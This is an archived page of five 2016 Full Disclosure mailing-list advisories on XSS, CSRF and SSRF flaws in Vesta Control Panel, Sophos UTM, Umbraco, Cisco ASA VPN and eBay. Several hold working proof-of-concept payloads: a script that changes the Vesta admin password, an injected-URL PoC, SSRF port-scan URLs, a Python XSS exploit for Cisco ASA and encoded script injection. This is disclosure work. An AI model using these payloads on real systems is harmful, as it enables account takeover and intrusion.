[FD] Vesta Control Panel <= 0.9.8-15 - Persistent XSS Vulnerability

2016-02-18 Thread Necmettin COŞKUN 
# Exploit Title :Vesta Control Panel <= 0.9.8-15 - Persistent XSS Vulnerability# Vendor Homepage   :http://www.vestacp.com# Version   :0.9.8-15# Exploit Author    :Necmettin COSKUN @babayarisi # Blog  :http://ha.cker.io# Discovery date    :16/02/2016# Tested on :Fedora23 - Chrome/Firefox/MaxthonWe can use user-agent information to attack website like this. First of all we change our user-agent and add some dangerous _javascript_ code ( XSS etc. ) and then we request to one of the website on target server then it is saved on access.log by server so when Administrator reads it the _javascript_ code works that we added our user-agent information.Poc Exploit1.Prepare evil js filefunction csrfWithToken(url,hanimisToken,password){ $.get(url, function(gelen) { $('body').append($(gelen)); $('form[id="vstobjects"]').css("display","none"); var token = $(hanimisToken).attr("token"); $('form[id="vstobjects"]').attr("action",url); $('input[name="v_password"]').val(password);  $('form[id="vstobjects"]').submit();  });};//password = 1234567csrfWithToken("/edit/user/?user=admin","#token","123456");2. Make a Get request with evil user-agent to victim server wget --header="Accept: text/html" --user-agent="" http://victimserver 3. We wait Administrator to read access.log that injected our evil.js4. We log-in VestaCP via password we changedhttp(s)://victim:8083/Discovered by:Necmettin COSKUN  |GrisapkaGuvenlikGrubu|4ewa2getha!# Exploit Title     :Vesta Control Panel <= 0.9.8-15 - Persistent XSS 
Vulnerability
# Vendor Homepage   :http://www.vestacp.com
# Version           :0.9.8-15
# Exploit Author    :Necmettin COSKUN @babayarisi 
# Blog              :http://ha.cker.io
# Discovery date    :16/02/2016
# Tested on :Fedora23 - Chrome/Firefox/Maxthon

We can use user-agent information to attack website like this. 
First of all we change our user-agent and add some dangerous javascript code ( 
XSS etc. ) 
and then we request to one of the website on target server then it is saved on 
access.log by server 
so when Administrator reads it the javascript code works that we added our 
user-agent information.

Poc Exploit

1.Prepare evil js file 

function csrfWithToken(url,hanimisToken,password){
$.get(url, function(gelen) {
$('body').append($(gelen));
$('form[id="vstobjects"]').css("display","none");
var token = $(hanimisToken).attr("token");
$('form[id="vstobjects"]').attr("action",url);
$('input[name="v_password"]').val(password);
$('form[id="vstobjects"]').submit();
});
};
//password = 1234567
csrfWithToken("/edit/user/?user=admin","#token","123456");

2. Make a Get request with evil user-agent to victim server
 
wget --header="Accept: text/html" --user-agent="" http://victimserver
 
3. We wait Administrator to read access.log that injected our evil.js
4. We log-in VestaCP via password we changed
http(s)://victim:8083/
  
  
Discovered by:

Necmettin COSKUN  |GrisapkaGuvenlikGrubu|4ewa2getha!
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] CVE-2016-2046 Cross Site Scripting in Sophos UTM 9

2016-02-18 Thread Mike Lisi 
---
Vendor:
---
Sophos (https://www.sophos.com)

-
Affected Products/Versions:
-
Product: Sophos UTM 9
Version: 9.350-12 with pattern version 92405 (potentially lower)


Description:

Title: Cross-site Scripting (XSS) in Sophos UTM 9
CVE: CVE-2016-2046
Researcher: Mike Lisi - HALOCK Security Labs (@MikeHacksThings)

A cross-site scripting vulnerability exists in Sophos UTM 9.350-12 with pattern 
version 92405 that allows attackers to craft a hyperlink that contains a 
reflected XSS payload via the ‘lang’ parameter. If visited by the targeted 
user, the XSS payload gets stored in a local cookie variable which is 
re-executed whenever the UserPortal landing page is visited. By not properly 
sanitizing the language selection parameter, an attacker can inject arbitrary 
Javascript or modify page contents by injecting remote HTML content. This does 
not require that the user be authenticated to the application.

Typically this would all be considered Reflected XSS, however, once one of the 
PoC links is visited by the targeted user, the data passed via the ‘lang’ 
parameter is stored in a local cookie file named ‘eup_force_lang’ on the user’s 
machine. Once the cookie is set, the user no longer needs to visit the 
malicious crafted links discussed before. The cookie data is injected into the 
page automatically. This persists until the cookie is cleared from the browser.

-
POC - Authentication not required:
-
https://XXX.XXX.XXX.XXX/?lang=english”;alert(‘xss’);//

-
Solution:
-
UTM 9.353 was officially announced and released on January 28, 2016 which 
includes a fix to address this vulnerability.


Reference:

CVE-2016-2046
https://blogs.sophos.com/2016/01/28/utm-up2date-9-353-released/
http://www.halock.com/blog/cve-2016-2046-cross-site-scripting-sophos-utm-9/

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Umbraco - The open source ASP.NET CMS Multiple Vulnerabilities

2016-02-18 Thread Sandeep Kamble 
[image: Vulnerable Umbraco]


Recently I got an assignment where I had to work on the Umbraco application
- a free Open Source Content Management System built on the ASP.NET
platform and is used by more than 2,25,000 websites. While performing the
security testing of this application, I discovered serious vulnerabilities
within this application, allowing to perform SSRF attack, CSRF Bypass
attack, and persistent XSS. The CVE number yet to be assigned to these
vulnerabilities. It would be strongly recommended to update the CMS to
latest version.

*SSRF Vulnerability*

Let me get start with Server side request forgery (ssrf) attack found
within the feedproxy.aspx. Those who new to SSRF, please follow this link.


I started off playing with the feedproxy.aspx, it is intersting page in
Umbraco . the feedproxy.aspx is used to access the external resources using
the URL GET parameter.

http://local/Umbraco/feedproxy.aspx?url=http://bobsite/index

once you change the URL to the
http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index, you able
to access the localhost application of the server.

Using this payload change the port number to perform port scanning of the
server. It will be helpful to find the more details of the server.
For example:

http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:25/index
http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:8080/index

If the port number is closed, you will find the error message on the
feedproxy.aspx page. Umbraco assigned bug ID U4-7457
 and fixed the issue.

*CSRF Bypass Vulnerability*

The Umbraco assigned bug ID U4-7459
, It was discovered that Umbraco
enabled sensitive actions, such as editing a user account information was
vulnerable to CSRF vulnerability.
The vulnerable code in templates.asmx.cs on the line number 75, it is
executing save operation without verifying the actual CSRF token.
In the file SetAngularAntiForgeryTokensAttributes.cs, on line number 25,
function allowing empty CSRF value, the CSRF vulnerability is triggering.

Find the more details on this fix on the below given link:

https://github.com/umbraco/Umbraco-CMS/commit/18c3345e47663a358a042652e697b988d6a380eb

*Persistent XSS Vulnerability*

It is found that Umbraco is also vulnerable to Persistent XSS in content
type editor. Umbraco has been assigned bug ID U4-7461.. This vulnerability
existed in the name field of the media page, the developer data edit page,
and the form page.[image: XSS Vulnerability in Umbraco]


[image: XSS Vulneraiblity in Umbraco]


[image: XSS Vulnerability Umbraco]


To mitigate these vulnerabilities, it is recommended to update Umbraco to
the version V7.4.0.

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Cisco ASA VPN - Zero Day Exploit

2016-02-18 Thread Juan Sacco 
# Exploit author: Juan Sacco - jsa...@exploitpack.com
# Affected program: Cisco ASA VPN Portal - Zero Day
# Cisco ASA VPN is prone to a XSS on the password recovery page.
# This vulnerability can be used by an attacker to capture other user's
credentials.
# The password recovery form fails to filter properly the hidden inputs
fields.
#
# This Zero Day exploit has been developed and discovered by Juan Sacco.
# Exploit Pack - Team http://exploitpack.com
#
# Release Dates:
# Reported to Cisco PSIRT Feb 4/2016
# Cisco Dev Team working on a fix Feb 15/2016
# Cisco PSIRT report a CVE Feb 15/2016
# Exploit Pack disclose the bug Feb 15/2016
# Disclosure of the Exploit Feb 16/2016
#
# Look for vulnerable targets here:
https://www.google.nl/#safe=off&q=+%2F%2BCSCOE%2B%2F
# More than 18.000 results in Google only

import string, sys
import socket, httplib
import telnetlib

def run():
   try:
Target = sys.argv[1]
Port = int(sys.argv[2])
# Here goes your custom JS agent code
Payload = "alert(1)"
VulnerableURL =
"/+CSCOE+/logon.html?reason=2&a0=63&a1=&a2=&a3=0&next=&auth_handle=&status=0&username=juansacco%22%20accesskey%3dX%20onclick%3d"
+ Payload + "%20sacco&password_min=0&state=&tgroup=&serverType=0&password_"
CraftedRequest = VulnerableURL
  # Start the connection
connection = httplib.HTTPSConnection(Target)
connection.request('GET', CraftedRequest)
Response = connection.getresponse()
print "Server status response:", Response.status, Response.reason
data =  Response.read()
vulnerable = "Target is not vulnerable"
for line in str(data).splitlines():
if "juansacco\\\"" in line:
vulnerable = "Targer is vulnerable"
if vulnerable != "Not vulnerable":
print "Result of the test:", vulnerable
# Find the injection on the response
connection.close()
   except Exception,e:
 print "Exploit connection closed " + str(e)

if __name__ == '__main__':
   print "Cisco VPN ASA Exploit - Zero Day"
   print ""
   print "Author: Juan Sacco - jsa...@exploitpack.com"

   try:
 Target = sys.argv[1]
 Port = sys.argv[2]
   except IndexError:
 pass
run()

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] EBAY Bugbounty: Persistent DOM Based XSS on ebay.com

2016-02-18 Thread Alexander Korznikov 
Hello all,

Description: Persistent DOM based Cross Site Scripting on ebay.com domain.
Disclosed to Ebay: January 2015
Fixed: February 2016
Vulnerability location: Every listing
Who are able to create: Sellers

Same origin policy bypass via postMessage

Write-up:
http://www.korznikov.com/2016/02/persistent-stored-dom-xss-on-ebaycom.html

Proof of Concept:

this code is inserted to the listing to pop-up alert on ebay.com domain.


window.onload = function() {
   var s = document.createElement('script');
   s.type = 'text/javascript';
   s.text
= 
atob("X29kdFRpdGxlPSdcPHNjcmlwdFw+YWxlcnQoXCd4c3MgYnkgYWxleGFuZGVyIGtvcnpuaWtvdlxcblxcblwnXCtkb2N1bWVudC5kb21haW4pO1w8XC9zY3JpcHRcPic7");
   document.body.appendChild(s);
   }


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/